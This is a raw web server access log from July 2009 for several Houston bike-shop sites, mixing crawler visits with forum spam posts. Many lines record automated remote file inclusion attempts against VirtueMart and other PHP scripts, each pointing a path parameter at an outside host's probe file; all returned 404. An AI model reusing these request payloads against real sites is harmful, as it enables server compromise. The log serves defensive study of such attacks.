206.53.157.238 - - [09/Jul/2009:17:12:34 -0700] "GET / HTTP/1.0" 200 1748 "http://locator.trekbikes.com/locator/profile/1742501" "BlackBerry9530/4.7.0.148 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/105" "www.svbikes.com"
206.53.157.238 - - [09/Jul/2009:17:12:34 -0700] "GET /favicon.ico HTTP/1.0" 404 275 "http://www.svbikes.com/" "BlackBerry9530/4.7.0.148 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/105" "www.svbikes.com"
206.53.157.238 - - [09/Jul/2009:17:12:51 -0700] "GET /Employeesite/ HTTP/1.0" 401 395 "http://www.svbikes.com/" "BlackBerry9530/4.7.0.148 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/105" "www.svbikes.com"
206.53.157.238 - - [09/Jul/2009:17:12:51 -0700] "GET /favicon.ico HTTP/1.0" 404 275 "http://www.svbikes.com/Employeesite/" "BlackBerry9530/4.7.0.148 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/105" "www.svbikes.com"
206.53.157.238 - quiz [09/Jul/2009:17:13:12 -0700] "GET /Employeesite/ HTTP/1.0" 401 395 "http://www.svbikes.com/" "BlackBerry9530/4.7.0.148 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/105" "www.svbikes.com"
206.53.157.238 - - [09/Jul/2009:17:13:12 -0700] "GET /favicon.ico HTTP/1.0" 404 275 "http://www.svbikes.com/Employeesite/" "BlackBerry9530/4.7.0.148 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/105" "www.svbikes.com"
206.53.157.238 - - [09/Jul/2009:17:13:19 -0700] "GET /P1000199.JPG HTTP/1.0" 200 1640919 "http://www.svbikes.com/" "BlackBerry9530/4.7.0.148 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/105" "www.svbikes.com"
65.55.211.69 - - [09/Jul/2009:17:17:08 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
65.55.211.69 - - [09/Jul/2009:17:17:09 -0700] "GET /logs/access_090210.log HTTP/1.1" 200 1310720 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
72.30.79.62 - - [09/Jul/2009:17:18:59 -0700] "GET /bullitinboard/viewtopic.php?p=15331 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
122.153.28.140 - - [09/Jul/2009:17:30:02 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
122.153.28.140 - - [09/Jul/2009:17:30:07 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
122.153.28.140 - - [09/Jul/2009:17:30:07 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
122.153.28.140 - - [09/Jul/2009:17:30:07 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
122.153.28.140 - - [09/Jul/2009:17:34:59 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
122.153.28.140 - - [09/Jul/2009:17:35:21 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
119.63.198.17 - - [09/Jul/2009:18:04:12 -0700] "GET /bullitinboard/viewtopic.php?p=11516 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "houstonbikeshop.com"
81.19.66.38 - - [09/Jul/2009:18:09:24 -0700] "GET /bullitinboard/viewtopic.php?p=1624 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [09/Jul/2009:18:09:24 -0700] "GET /bullitinboard/viewtopic.php?p=1625 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [09/Jul/2009:18:09:24 -0700] "GET /bullitinboard/viewtopic.php?p=1663 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [09/Jul/2009:18:09:25 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [09/Jul/2009:18:09:26 -0700] "GET /bullitinboard/viewtopic.php?p=2005 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
122.153.28.140 - - [09/Jul/2009:18:16:43 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
122.153.28.140 - - [09/Jul/2009:18:16:46 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
122.153.28.140 - - [09/Jul/2009:18:16:48 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
122.153.28.140 - - [09/Jul/2009:18:17:02 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
122.153.28.140 - - [09/Jul/2009:18:17:02 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
122.153.28.140 - - [09/Jul/2009:18:17:02 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [09/Jul/2009:18:18:17 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
211.236.242.164 - - [09/Jul/2009:18:20:59 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [09/Jul/2009:18:20:59 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [09/Jul/2009:18:20:59 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [09/Jul/2009:18:23:30 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [09/Jul/2009:18:23:30 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [09/Jul/2009:18:23:30 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [09/Jul/2009:18:29:21 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [09/Jul/2009:18:35:40 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
122.153.28.140 - - [09/Jul/2009:18:36:43 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.57.2 - - [09/Jul/2009:18:47:57 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.57.2 - - [09/Jul/2009:18:47:57 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.57.2 - - [09/Jul/2009:18:47:57 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [09/Jul/2009:18:50:05 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [09/Jul/2009:18:50:05 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [09/Jul/2009:18:50:05 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [09/Jul/2009:18:50:06 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [09/Jul/2009:18:50:06 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [09/Jul/2009:18:50:07 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.57.2 - - [09/Jul/2009:18:52:48 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.57.2 - - [09/Jul/2009:18:52:48 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.57.2 - - [09/Jul/2009:18:52:48 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
204.62.55.11 - - [09/Jul/2009:18:56:14 -0700] "GET /translations?N=A HTTP/1.1" 301 103 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.svbikes.com"
204.62.55.11 - - [09/Jul/2009:18:56:16 -0700] "GET /translations/?N=A HTTP/1.1" 200 3847 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.svbikes.com"
211.236.242.164 - - [09/Jul/2009:18:58:50 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [09/Jul/2009:18:59:02 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [09/Jul/2009:18:59:20 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [09/Jul/2009:18:59:27 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [09/Jul/2009:19:07:09 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
83.13.191.186 - - [09/Jul/2009:19:09:32 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
83.13.191.186 - - [09/Jul/2009:19:09:32 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
83.13.191.186 - - [09/Jul/2009:19:09:32 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
83.13.191.186 - - [09/Jul/2009:19:09:46 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
83.13.191.186 - - [09/Jul/2009:19:09:46 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
83.13.191.186 - - [09/Jul/2009:19:09:49 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [09/Jul/2009:19:10:28 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [09/Jul/2009:19:13:38 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
122.153.28.140 - - [09/Jul/2009:19:14:29 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
122.153.28.140 - - [09/Jul/2009:19:14:30 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
122.153.28.140 - - [09/Jul/2009:19:14:30 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
122.153.28.140 - - [09/Jul/2009:19:14:30 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
122.153.28.140 - - [09/Jul/2009:19:14:34 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
122.153.28.140 - - [09/Jul/2009:19:14:34 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [09/Jul/2009:19:16:56 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
83.13.191.186 - - [09/Jul/2009:19:18:32 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
83.13.191.186 - - [09/Jul/2009:19:18:32 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
83.13.191.186 - - [09/Jul/2009:19:18:32 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
92.48.127.79 - - [09/Jul/2009:19:27:18 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
92.48.127.79 - - [09/Jul/2009:19:27:18 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
92.48.127.79 - - [09/Jul/2009:19:27:18 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
92.48.127.79 - - [09/Jul/2009:19:27:21 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
92.48.127.79 - - [09/Jul/2009:19:27:22 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
92.48.127.79 - - [09/Jul/2009:19:27:22 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [09/Jul/2009:19:29:01 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
88.191.37.60 - - [09/Jul/2009:19:29:48 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
88.191.37.60 - - [09/Jul/2009:19:29:48 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
88.191.37.60 - - [09/Jul/2009:19:29:54 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
65.55.211.72 - - [09/Jul/2009:19:30:13 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
65.55.211.72 - - [09/Jul/2009:19:30:13 -0700] "GET /tmp/?D=A HTTP/1.1" 200 659 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
92.48.127.79 - - [09/Jul/2009:19:30:14 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
88.191.37.60 - - [09/Jul/2009:19:30:23 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
88.191.37.60 - - [09/Jul/2009:19:30:23 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
88.191.37.60 - - [09/Jul/2009:19:30:27 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
92.48.127.79 - - [09/Jul/2009:19:30:34 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
122.153.28.140 - - [09/Jul/2009:19:32:48 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
92.50.143.90 - - [09/Jul/2009:19:36:40 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://eng.nevskydvor.ru/php/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "houstonbikeshop.com"
92.50.143.90 - - [09/Jul/2009:19:36:40 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://eng.nevskydvor.ru/php/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "houstonbikeshop.com"
92.50.143.90 - - [09/Jul/2009:19:36:40 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://eng.nevskydvor.ru/php/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "houstonbikeshop.com"
72.30.79.62 - - [09/Jul/2009:19:38:43 -0700] "GET /bullitinboard/viewtopic.php?p=15826 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
209.172.33.230 - - [09/Jul/2009:19:40:20 -0700] "GET /translations/Hungarian.txt//tools/send_reminders.php?noSet=0&includedir=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "houstonbikeshop.com"
209.172.33.230 - - [09/Jul/2009:19:40:20 -0700] "GET /translations/Swedish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "houstonbikeshop.com"
209.172.33.230 - - [09/Jul/2009:19:40:20 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "houstonbikeshop.com"
209.172.33.230 - - [09/Jul/2009:19:40:20 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "houstonbikeshop.com"
211.236.242.164 - - [09/Jul/2009:19:40:32 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [09/Jul/2009:19:40:32 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [09/Jul/2009:19:40:32 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [09/Jul/2009:19:40:32 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [09/Jul/2009:19:40:33 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [09/Jul/2009:19:40:33 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
211.236.242.164 - - [09/Jul/2009:19:40:33 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
209.172.33.230 - - [09/Jul/2009:19:40:52 -0700] "GET /translations//ws/index.php?includedir=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "houstonbikeshop.com"
209.172.33.230 - - [09/Jul/2009:19:40:52 -0700] "GET /translations/Swedish.txt//ws/index.php?includedir=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "houstonbikeshop.com"
209.172.33.230 - - [09/Jul/2009:19:40:52 -0700] "GET /ws/index.php?includedir=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "houstonbikeshop.com"
209.172.33.230 - - [09/Jul/2009:19:40:52 -0700] "GET /translations/Hungarian.txt//ws/index.php?includedir=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "houstonbikeshop.com"
209.172.33.230 - - [09/Jul/2009:19:40:55 -0700] "GET /translations/Hungarian.txt//ws/login.php?includedir=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "houstonbikeshop.com"
209.172.33.230 - - [09/Jul/2009:19:40:55 -0700] "GET /translations/Swedish.txt//ws/login.php?includedir=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "houstonbikeshop.com"
209.172.33.230 - - [09/Jul/2009:19:40:55 -0700] "GET /ws/login.php?includedir=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.812" "houstonbikeshop.com"
209.172.33.230 - - [09/Jul/2009:19:40:55 -0700] "GET /translations//ws/login.php?includedir=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.812" "houstonbikeshop.com"
74.86.17.106 - - [09/Jul/2009:19:41:11 -0700] "GET /translations/Italian.txt%20//ws/index.php?includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
74.86.17.106 - - [09/Jul/2009:19:41:11 -0700] "GET /translations/Hungarian.txt%20//ws/index.php?includedir=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
